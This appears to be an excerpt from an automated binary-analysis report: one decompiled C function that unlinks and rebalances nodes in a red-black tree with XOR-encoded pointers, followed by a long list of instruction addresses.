                                                                Function 0162F900 Relevance: .9, Instructions: 863COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 99%
                                                                			E0162F900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}








































































































                                                                0x0162f90b
                                                                0x0162f911
                                                                0x0162f917
                                                                0x0162f919
                                                                0x0162f91c
                                                                0x01685d63
                                                                0x01685d69
                                                                0x01685d69
                                                                0x01685d63
                                                                0x0162f922
                                                                0x0162f927
                                                                0x01685d72
                                                                0x01685d78
                                                                0x01685d78
                                                                0x01685d72
                                                                0x0162f92d
                                                                0x0162f931
                                                                0x0162fa2d
                                                                0x0162fa2d
                                                                0x0162f939
                                                                0x0162f940
                                                                0x0162f944
                                                                0x0162fa37
                                                                0x0162fa39
                                                                0x0162fa3c
                                                                0x0162fa3e
                                                                0x0162fa41
                                                                0x0162fa48
                                                                0x0162fe68
                                                                0x0162fe6c
                                                                0x0162fe6c
                                                                0x0162fe78
                                                                0x0162fe78
                                                                0x0162fe7a
                                                                0x0162fe7a
                                                                0x0162fe7e
                                                                0x0162fe6e
                                                                0x0162fe6e
                                                                0x0162fe72
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0162fe80
                                                                0x0162fe80
                                                                0x0162fe83
                                                                0x00000000
                                                                0x0162fe83
                                                                0x01685d7f
                                                                0x01685d81
                                                                0x00000000
                                                                0x00000000
                                                                0x01685d87
                                                                0x00000000
                                                                0x01685d87
                                                                0x0162fa4e
                                                                0x0162fa50
                                                                0x01685d90
                                                                0x00000000
                                                                0x00000000
                                                                0x01685d98
                                                                0x0162fa58
                                                                0x0162fa58
                                                                0x0162fa5d
                                                                0x0162fa60
                                                                0x0162fa63
                                                                0x0162fa69
                                                                0x0162fa6b
                                                                0x0162fa6e
                                                                0x0162fa71
                                                                0x01685da1
                                                                0x01685da7
                                                                0x01685da7
                                                                0x01685da1
                                                                0x0162fa79
                                                                0x01630071
                                                                0x01630073
                                                                0x01630074
                                                                0x00000000
                                                                0x0162fa7f
                                                                0x0162fa83
                                                                0x0162fa85
                                                                0x01685dae
                                                                0x01685dae
                                                                0x0162fa8b
                                                                0x0162fa8f
                                                                0x0162fa98
                                                                0x0162faa1
                                                                0x0162faa4
                                                                0x0162faa6
                                                                0x0162faa9
                                                                0x0162faac
                                                                0x01685db7
                                                                0x01685dbd
                                                                0x01685dbd
                                                                0x01685db7
                                                                0x0162fab4
                                                                0x00000000
                                                                0x0162faba
                                                                0x0162fabc
                                                                0x0162fac2
                                                                0x0162fac5
                                                                0x0162fac7
                                                                0x0162fac7
                                                                0x0162fad6
                                                                0x0162fad9
                                                                0x0162fadf
                                                                0x0162fae2
                                                                0x0162fae4
                                                                0x0162fae7
                                                                0x0162faea
                                                                0x0162faed
                                                                0x01685dc4
                                                                0x01685dc9
                                                                0x00000000
                                                                0x00000000
                                                                0x01685dcf
                                                                0x0162faf6
                                                                0x0162fafa
                                                                0x0162fafc
                                                                0x0162fafc
                                                                0x0162fafe
                                                                0x0162fb01
                                                                0x0162fb09
                                                                0x0162fb0c
                                                                0x0162fb12
                                                                0x0162fb14
                                                                0x0162fb17
                                                                0x01685dd6
                                                                0x01685dd9
                                                                0x01685dde
                                                                0x00000000
                                                                0x00000000
                                                                0x01685de4
                                                                0x01685de7
                                                                0x0162fb29
                                                                0x0162fb2c
                                                                0x01685df3
                                                                0x01685df6
                                                                0x01685e06
                                                                0x01685e0c
                                                                0x01685e0f
                                                                0x01685e11
                                                                0x00000000
                                                                0x01685e1f
                                                                0x00000000
                                                                0x01685e1f
                                                                0x01685e11
                                                                0x01685df8
                                                                0x01685dfb
                                                                0x01685e00
                                                                0x00000000
                                                                0x00000000
                                                                0x01685e02
                                                                0x00000000
                                                                0x01685e02
                                                                0x0162fb32
                                                                0x0162fb35
                                                                0x0162fb3c
                                                                0x01685e26
                                                                0x01685e28
                                                                0x01685e28
                                                                0x01685e2e
                                                                0x01685e3c
                                                                0x01685e3c
                                                                0x01685e2e
                                                                0x0162fb45
                                                                0x0162fb47
                                                                0x0162fb53
                                                                0x0162fb56
                                                                0x0162fb59
                                                                0x0162fb5c
                                                                0x0162fb65
                                                                0x0163000d
                                                                0x00000000
                                                                0x0163000f
                                                                0x0163000f
                                                                0x00000000
                                                                0x0163000f
                                                                0x0162fb6b
                                                                0x0162fb6e
                                                                0x0162fb71
                                                                0x0162fb73
                                                                0x0162fb76
                                                                0x01685e45
                                                                0x01685e4b
                                                                0x01685e4b
                                                                0x01685e45
                                                                0x0162fb80
                                                                0x0162fb83
                                                                0x01685e54
                                                                0x01685e5a
                                                                0x01685e5a
                                                                0x01685e54
                                                                0x0162fb89
                                                                0x0162fb98
                                                                0x0162fb9b
                                                                0x0162fb9e
                                                                0x0162fba0
                                                                0x01685e63
                                                                0x01685e69
                                                                0x01685e69
                                                                0x01685e63
                                                                0x0162fba8
                                                                0x00000000
                                                                0x0162fbae
                                                                0x0162fbb2
                                                                0x01685e70
                                                                0x0162fbb8
                                                                0x0162fbb8
                                                                0x0162fbb8
                                                                0x0162fbbd
                                                                0x0162fbbf
                                                                0x0162fbbf
                                                                0x0162f9a8
                                                                0x0162f9a8
                                                                0x0162f9ad
                                                                0x0162f9b4
                                                                0x01685eda
                                                                0x00000000
                                                                0x00000000
                                                                0x01685ee2
                                                                0x0162f9bc
                                                                0x0162f9bc
                                                                0x0162f9bf
                                                                0x0162f9c4
                                                                0x0162fde6
                                                                0x0162fde9
                                                                0x0162fdec
                                                                0x0162fdef
                                                                0x0162fdf2
                                                                0x01685eeb
                                                                0x01685ef1
                                                                0x01685ef1
                                                                0x01685eeb
                                                                0x0162fdfa
                                                                0x00000000
                                                                0x0162fe00
                                                                0x0162fe04
                                                                0x01685efa
                                                                0x01685f00
                                                                0x01685f00
                                                                0x01685efa
                                                                0x0162fe0a
                                                                0x0162fa24
                                                                0x0162fa2a
                                                                0x0162fa2a
                                                                0x0162fdfa
                                                                0x0162f9cd
                                                                0x00000000
                                                                0x0162f9cf
                                                                0x0162f9cf
                                                                0x0162f9d1
                                                                0x0162f9d4
                                                                0x0162f9d7
                                                                0x0162f9d9
                                                                0x0162f9dc
                                                                0x0162f9df
                                                                0x0162f9e2
                                                                0x0162f9e7
                                                                0x01685f09
                                                                0x00000000
                                                                0x00000000
                                                                0x01685f11
                                                                0x0162f9ef
                                                                0x0162f9f3
                                                                0x0162fed5
                                                                0x0162fed8
                                                                0x0162fedb
                                                                0x01685f1a
                                                                0x01685f20
                                                                0x01685f20
                                                                0x01685f1a
                                                                0x0162fee3
                                                                0x00000000
                                                                0x0162fee9
                                                                0x0162feeb
                                                                0x01685f29
                                                                0x01685f2f
                                                                0x01685f2f
                                                                0x01685f29
                                                                0x0162fef3
                                                                0x00000000
                                                                0x0162fef9
                                                                0x0162fefc
                                                                0x0162ff01
                                                                0x01685f38
                                                                0x01630052
                                                                0x01630054
                                                                0x00000000
                                                                0x01630056
                                                                0x01630056
                                                                0x0162ff40
                                                                0x0162ff42
                                                                0x01685f6e
                                                                0x01685f74
                                                                0x01685f74
                                                                0x01685f6e
                                                                0x0162ff50
                                                                0x0162ff56
                                                                0x0162ff5b
                                                                0x01685f7d
                                                                0x00000000
                                                                0x00000000
                                                                0x01685f83
                                                                0x00000000
                                                                0x0162ff61
                                                                0x0162ff61
                                                                0x0162ff63
                                                                0x01630021
                                                                0x01630026
                                                                0x0163002b
                                                                0x0163007e
                                                                0x01630080
                                                                0x01630080
                                                                0x0163007e
                                                                0x0163002f
                                                                0x00000000
                                                                0x01630031
                                                                0x01630033
                                                                0x01630086
                                                                0x01630035
                                                                0x01630035
                                                                0x01630035
                                                                0x0163003c
                                                                0x00000000
                                                                0x0163003c
                                                                0x0163002f
                                                                0x0162ff69
                                                                0x0162ff6b
                                                                0x01685f8c
                                                                0x01685f92
                                                                0x01685f92
                                                                0x01685f8c
                                                                0x0162ff74
                                                                0x0162ff77
                                                                0x0162ff7b
                                                                0x01685f99
                                                                0x01685f9b
                                                                0x0162ff81
                                                                0x0162ff81
                                                                0x0162ff83
                                                                0x0162ff83
                                                                0x0162ff88
                                                                0x0162ff8b
                                                                0x0162ff90
                                                                0x0162ff92
                                                                0x0162ff92
                                                                0x0162ff9c
                                                                0x0162ffa2
                                                                0x0162ffa6
                                                                0x0162ffaa
                                                                0x0162ffad
                                                                0x0162ffb2
                                                                0x01685fa4
